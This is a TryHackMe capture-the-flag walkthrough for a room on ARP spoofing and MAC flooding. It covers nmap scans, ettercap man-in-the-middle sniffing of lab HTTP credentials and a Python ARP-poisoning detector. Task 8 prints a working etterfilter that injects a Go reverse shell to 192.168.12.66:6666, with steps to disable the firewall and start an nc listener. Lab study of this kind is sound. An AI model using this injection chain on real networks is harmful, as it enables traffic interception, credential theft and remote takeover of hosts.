Tryhackme L2 MAC Flooding & ARP Spoofing writeup
TASK 2
Note: The admin user is in the sudo group. I suggest using the root user to complete this room.
sudo su (password: Layer2)
Q.1 Now, can you (re)gain access?(Yay/Nay).
Ans. Yea
TASK 3
Q. 1 What is your IP address?
ip address show eth1
Ans. 192.168.12.66

Q. 2 What's the network's CIDR prefix?
Ans. /24
Q. 4 How many other live hosts are there?
nmap -sn 192.168.12.66/24
Ans. 2
Q. 5 What's the hostname of the first host (lowest IP address) you've found?
Ans. alice
TASK 4
Q. 1 Can you see any traffic from those hosts? (Yay/Nay)
Ans. yea
Q. 2 Who keeps sending packets to eve?
Ans. bob
Q. 3 What type of packets are sent?
Ans. icmp
Hint for Q3 & Q4: see the figure.

Q. 4 What's the size of their data section? (bytes)
Ans. 666
TASK 5
Q. 1 What kind of packets is Alice continuously sending to Bob?
Ans. icmp
Q. 2 What's the size of their data section? (bytes)
Ans. 1337 (found the same way as Q3 & Q4 in Task 4)
Task 6
Q.1 Can ettercap establish a MITM in between Alice and Bob? (Yay/Nay)
Ans. nay
Q. 2 Would you expect a different result when attacking hosts without ARP packet validation enabled? (Yay/Nay)
Ans. yay
TASK 7
Note: use the root user
sudo su (password: Layer2)
Q. 1 Scan the network on eth1. Who's there? Enter their IP addresses in ascending order.
nmap 192.168.12.0/24
Ans. 192.168.12.10, 192.168.12.20

Q. 2 Which machine has an open well-known port?
Ans. 192.168.12.20
Q. 3 What is the port number?
Ans. 80
Q. 4 Can you access the content behind the service from your current position? (Nay/Yay)
Ans. Nay
Q. 5 Can you see any meaningful traffic to or from that port passively sniffing on your interface eth1? (Nay/Yay)
Ans. Nay
Q. 6 Now launch the same ARP spoofing attack as in the previous task. Can you see some interesting traffic, now? (Nay/Yay)
Ans. Yay
To launch the ARP spoofing attack:
ettercap -T -i eth1 -M arp
To save the captured output for reading later:
ettercap -T -i eth1 -M arp > myarp.txt
(read myarp.txt carefully; the answers to Q7, Q8, Q9, Q11 and Q17 are found there)
Q. 7 Who is using that service?
Ans. alice
Q. 8 What's the hostname the requests are sent to?
Ans. www.server.bob

Q. 9 Which file is being requested?
Ans. test.txt
Q. 10 What text is in the file?
curl -u admin:s3cr3t_p4zz http://192.168.12.20/test.txt
Ans. ok

Q. 11 Which credentials are being used for authentication? (username:password)
Ans. admin:s3cr3t_P4zz
Q. 12 Now, stop the attack (by pressing q). What is ettercap doing in order to leave its man-in-the-middle position gracefully and undo the poisoning?
Ans. RE-ARPing the victims
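A defender's view of what Q6 and Q12 look like on the wire, as an added example that is not part of the original writeup: a small Python detector fed a constructed list of ARP replies (made-up MACs, the room's IPs). It flags the poisoning as an IP suddenly claiming a new MAC and as one MAC answering for both Alice and Bob, and flags the re-ARP step as the bindings flipping back.

```python
"""Detect ARP cache poisoning from a stream of ARP replies.

Two signals: an IP whose sender MAC changes from the binding learned
earlier (the poisoning, and again when ettercap re-ARPs the victims),
and one MAC claiming several IPs at once (the attacker's interface
answering for both Alice and Bob).
"""
from collections import defaultdict

# Constructed sample, not a real capture: (seq, sender_ip, sender_mac)
# for ARP replies seen on eth1. MACs are made up; IPs match the room.
SAMPLE_REPLIES = [
    (1, "192.168.12.10", "02:00:00:00:00:0a"),  # alice, legitimate
    (2, "192.168.12.20", "02:00:00:00:00:14"),  # bob, legitimate
    (3, "192.168.12.66", "02:00:00:00:00:42"),  # attacker box itself
    (4, "192.168.12.10", "02:00:00:00:00:42"),  # poison: attacker claims alice
    (5, "192.168.12.20", "02:00:00:00:00:42"),  # poison: attacker claims bob
    (6, "192.168.12.10", "02:00:00:00:00:0a"),  # re-ARP: alice restored
    (7, "192.168.12.20", "02:00:00:00:00:14"),  # re-ARP: bob restored
]


def detect_arp_poisoning(replies):
    """Return alerts as (seq, kind, ip, mac).

    kind is "mapping-change" or "mac-claims-multiple-ips". The first
    binding seen for an IP is trusted as the baseline (an assumption;
    a static table of known hosts is better where one exists).
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for seq, ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append((seq, "mapping-change", ip, mac))
            mac_to_ips[known].discard(ip)  # old owner no longer holds this IP
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append((seq, "mac-claims-multiple-ips", ip, mac))
    return alerts


def suspect_macs(alerts):
    """MACs that answered for more than one IP: the likely poisoner."""
    return {mac for _, kind, _, mac in alerts if kind == "mac-claims-multiple-ips"}
```

On a real segment the same logic can be fed from a packet capture on eth1; the hosts with ARP packet validation in Task 6 are effectively doing the first check for themselves.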
Q. 13 Can you access the content behind that service, now, using the obtained credentials? (Nay/Yay)
Ans. Yay
Q. 14 What is the user.txt flag?
curl -u admin:s3cr3t_p4zz http://192.168.12.20/user.txt
Ans. THM{..........}
Q. 15 You should also have seen some rather questionable kind of traffic. What kind of remote access (shell) does Alice have on the server?
Ans. reverse shell
Q. 16 What commands are being executed? Answer in the order they are being executed.
Ans. whoami, pwd, ls

Q.17 Which of the listed files do you want?
Ans. root.txt

TASK 8
Q. 1 What is the root.txt flag?
Ans. THM{........}
Read each line of Task 8 of the L2 MAC Flooding & ARP Spoofing room on TryHackMe carefully.
Follow these steps to find the root flag.
Hint: run these steps on the SSH machine, not on your local machine.
Step 1. Copy the following filter and save it as whoami.ecf
Note: if this filter does not work, download the whoami.ecf file from the repo (Download).
# Match TCP traffic from the reverse-shell port seen in Task 7 (4444)
# whose payload contains the command "whoami".
if (ip.proto == TCP && tcp.src == 4444 && search(DATA.data, "whoami") ) {
    # Keep a copy of the original payload for reference.
    log(DATA.data, "/root/ettercap.log");
    # Swap the command for one that writes and runs the Go reverse shell
    # (inner double quotes must be escaped with a backslash inside the etterfilter string).
    replace("whoami", "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"192.168.12.66:6666\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go &" );
    msg("###### ETTERFILTER: substituted 'whoami' with reverse shell. ######\n");
}
Step 2. Compile the filter source with etterfilter
etterfilter whoami.ecf -o whoami.ef
Step 3. Disable the firewall
sudo ufw disable (password: Layer2)
Step 4. Open another SSH session and start a netcat listener
Hint: use the same port in the filter source and in the netcat listener.
nc -nvlp 6666 &
Step 5. Run ettercap with the compiled filter
sudo ettercap -T -i eth1 -M arp -F whoami.ef
A few seconds after executing this command, you should see "Connection received on 192.168.12.20" on the netcat listener.
Step 6. In the netcat session, type "fg" to bring the listener to the foreground.
Enjoy the reverse shell.
Thank you
This is my first writeup; if I made any mistake, forgive me.
If you have any questions, connect with me on LinkedIn (use TryHackMe to get my LinkedIn ID).
Ajeet Kumar
